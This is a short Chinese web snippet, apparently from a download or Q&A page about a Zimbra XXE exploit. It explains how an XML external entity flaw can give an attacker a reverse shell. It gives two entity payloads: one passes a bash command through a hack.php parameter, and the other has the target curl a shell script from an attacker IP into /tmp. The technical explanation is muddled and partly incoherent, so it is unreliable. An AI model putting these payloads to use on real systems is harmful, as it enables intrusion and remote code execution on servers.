xxe反弹shell
时间: 2023-11-07 11:05:19 浏览: 364
Zimbra 小于 8.8.11版本 XXE GetShell EXP.rar
XXE反弹shell是一种利用XML外部实体漏洞(XXE)的方法,在目标系统中执行恶意代码并获取对系统的控制权。通过在XML文档中注入恶意实体引用,攻击者可以远程读取文件、执行任意命令或在目标系统上创建文件。在这种情况下,由于存在无回显,所以只能利用盲目XXE方法来进行攻击。
在该方法中,通过定义一个XXE实体,将远程服务器的命令注入到目标系统中。以下是两个示例:
1. `<!ENTITY XXESYSTEM "http://127.0.0.1/hack.php?1=/bin/bash /tmp/1.txt" >]>` - 这个实体定义了一个远程服务器的命令,它将通过`/bin/bash`命令将结果写入到`/tmp/1.txt`文件中。
2. `<!ENTITY XXESYSTEM "http://127.0.0.1/hack.php?1=curl -o /tmp/1.txt 192.168.55.129/bash.txt" >]>` - 这个实体定义了一个远程服务器的命令,它使用`curl`命令从`192.168.55.129/bash.txt`下载文件,并将其保存到`/tmp/1.txt`中。
通过在XML文档中使用这些实体引用,攻击者可以触发XXE漏洞并执行恶意命令。
阅读全文